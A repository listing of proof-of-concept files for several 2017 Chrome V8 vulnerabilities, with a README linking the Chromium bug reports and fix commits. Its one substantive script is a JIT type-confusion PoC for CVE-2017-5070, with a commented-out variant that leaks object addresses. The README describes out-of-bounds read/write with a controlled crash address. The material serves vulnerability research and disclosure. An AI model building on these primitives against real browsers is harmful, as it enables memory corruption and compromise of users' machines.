├── CVE-2017-15399 ├── hello_chrome_3.html └── poc.html ├── CVE-2017-15428 └── replace_csa.html ├── CVE-2017-5070 ├── 5070_poc.js └── hello_chrome.html ├── CVE-2017-XXXX └── wasm_init.html └── README.md /CVE-2017-15399/hello_chrome_3.html: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /CVE-2017-15399/poc.html: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /CVE-2017-15428/replace_csa.html: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /CVE-2017-5070/5070_poc.js: --------------------------------------------------------------------------------
// Proof-of-concept script for CVE-2017-5070 (chromium issue 722756 per README.md).
// README.md attributes the bug to V8's Crankshaft JIT and reports reproduction on
// Chrome 58.0.3029.110; engines that no longer ship Crankshaft are not expected
// to be affected. print() is the d8 shell builtin, so this file targets d8 rather
// than a page (hello_chrome.html alongside it presumably wraps it for a browser;
// its contents are not shown in this listing).
// Statement order and the 0x10000 iteration counts are part of the PoC: they
// drive JIT warm-up, so this script must not be reordered or "cleaned up".
1 | z2 = [1.1,2.2];   // implicit globals (z2, z3, and re below); only arr_arr, obj and evil use var
2 | z3 = [1,{}];      // z2 holds only doubles, z3 holds an object; f() writes the same double into index 1 of both
3 | var arr_arr = [z2,z3];
4 | var obj = {};     // unused by the live script; the commented-out variant below stores it via temp[1] = obj
// f(): stores the double 1.1 at index 1 of every array currently in arr_arr.
// It is warmed up by the loop below so the optimizing compiler compiles it.
5 | function f(){
6 |
7 | for(var i = 0;i < arr_arr.length;i++){
8 | var temp = arr_arr[i];
9 | temp[1] = 1.1;
10 | }
11 | }
12 |
// Warm-up: 0x10000 calls so f() gets JIT-compiled (cf. the commented-out
// "wait for the JIT complete" line further down).
13 | for(var i = 0;i < 0x10000;i++){
14 | f();
15 | }
16 |
17 | var evil = [1.1,2.2];   // fresh double array; only substituted into arr_arr after warm-up (line 36)
18 |
// oo(): writes evil[0], runs f(), then overwrites evil[1] with a denormal double.
// The constant is numerically tiny and is presumably chosen for its raw 64-bit
// pattern rather than its value; the repo does not explain it. This variant has
// no live return statement (compare the commented-out copy below).
19 | function oo(){
20 | //z2[0] = 2.2;
21 | evil[0] = 1.1;
22 | f();
23 | evil[1] = 6.176516726456e-312;
24 | //return evil[1];
25 | }
26 |
// Warm-up for oo() (and, through it, further calls to f()).
27 | for(var i = 0;i < 0x10000;i++){
28 | oo();
29 | }
30 | //evil.slice();
31 |
32 |
33 | //var now = Date.now();
34 | //while(Date.now() - now < 500){}; //wait for the JIT complete
35 |
// Only after both warm-up loops is evil swapped in for z2, so the already
// compiled f() now operates on evil at index 0.
36 | arr_arr[0] = evil;
37 | re = oo();   // oo() has no live return, so re is undefined here; leftover from the variant below
38 |
// d8 builtin. Prints whatever the final store to evil[1] produced; this is the
// PoC's only observable output, and the expected value is not documented here.
39 | print(evil[1]);
40 |
41 |
// Second, commented-out variant: arr_arr is [z3,z2], f() stores the object obj
// instead of 1.1 (the inline note reads "leak any object address here"), oo()
// returns evil[1], and the returned value re is printed instead of evil[1].
42 | /*
43 | z2 = [1.1,2.2];
44 | z3 = [1,{}];
45 | var arr_arr = [z3,z2];
46 | var obj = {};
47 | function f(){
48 |
49 | for(var i = 0;i < arr_arr.length;i++){
50 | var temp = arr_arr[i];
51 | temp[1] = obj; //leak any object address here;
52 | }
53 | }
54 |
55 | for(var i = 0;i < 0x10000;i++){
56 | f();
57 | }
58 |
59 | var evil = [1.1,2.2];
60 |
61 | function oo(){
62 | //z2[0] = 2.2;
63 | evil[0] = 1.1;
64 | f();
65 | //evil[1] = 6.176516726456e-312;
66 | return evil[1];
67 | }
68 |
69 | for(var i = 0;i < 0x10000;i++){
70 | oo();
71 | }
72 | //evil.slice();
73 |
74 |
75 | //var now = Date.now();
76 | //while(Date.now() - now < 500){}; //wait for the JIT complete
77 |
78 | arr_arr[0] = evil;
79 | re = oo();
80 |
81 | print(re);
82 | */ -------------------------------------------------------------------------------- /CVE-2017-5070/hello_chrome.html: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /CVE-2017-XXXX/wasm_init.html: -------------------------------------------------------------------------------- 1 | 1105 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | V8_November_2017 2 | 3 | Some V8 vuls which they were fixed in about November 2017. 4 | 5 | CVE-2017-5070 6 | 7 | https://bugs.chromium.org/p/chromium/issues/detail?id=722756 8 | 9 | Chrome version: 58.0.3029.110 Channel: stable 10 | 11 | This problem belongs to the crankshaft,in the latest V8 version(16th May 2017)(use crankshaft to JIT),I can reproduce this issue.At this version,the chrome use crankshaft to JIT. 12 | 13 | CVE-2017-15399 14 | 15 | https://bugs.chromium.org/p/chromium/issues/detail?id=776677 16 | 17 | https://chromium.googlesource.com/v8/v8.git/+/5f960dfc06a7c95af69e2b09f772b2280168469b 18 | 19 | VULNERABILITY DETAILS 20 | 21 | This is a Use After Free Vul in V8.More information please see the html file. 
22 |
23 | VERSION
24 |
25 | Chrome Version: 62.0.3202.62 Stable (32bit)
26 |
27 | Operating System: [Windows 10 1703 64bit] 8G Memory
28 |
29 |
30 | CVE-2017-15428
31 |
32 | https://bugs.chromium.org/p/chromium/issues/detail?id=782145
33 |
34 | https://chromium.googlesource.com/v8/v8.git/+/55a98076827edac8eba775f8025df3749bcd8367
35 |
36 | VULNERABILITY DETAILS
37 |
38 | There is a type confusion problem in the String.prototype.replace runtime call. If we change the RegExp type (from fast regexp to slow regexp), we still go down the fast regexp code path. Ultimately, this causes an OOB Read/Write of the lastIndex.
39 |
40 | VERSION
41 |
42 | Chrome Version: 62.0.3202.89 Stable 64 bit
43 |
44 | Operating System: Windows 10 1703 64bit
45 |
46 | REPRODUCTION CASE
47 |
48 | In the debug build, it crashes at CSA_ASSERT(this, IsFastRegExp(context, regexp)) in the function TF_BUILTIN(RegExpReplace, RegExpBuiltinsAssembler);
49 |
50 | In the release build, it crashes at the address 0x300000008; note that this address is controlled through the lastIndex value.
51 |
52 | CVE-2017-XXXX (duplicate of a Chromium worker's report)
53 |
54 | https://bugs.chromium.org/p/chromium/issues/detail?id=782102
55 |
56 | https://chromium.googlesource.com/v8/v8.git/+/b60438869987952083597c2ce55a9abdba19d557
57 |
58 | VULNERABILITY DETAILS
59 |
60 | This is an OOB Read/Write problem in V8:WebAssembly.
61 |
62 | VERSION
63 |
64 | Chrome Version: 62.0.3202.89 Stable Operating System: Windows 10 1703 64bit
65 |
66 | REPRODUCTION CASE
67 | --------------------------------------------------------------------------------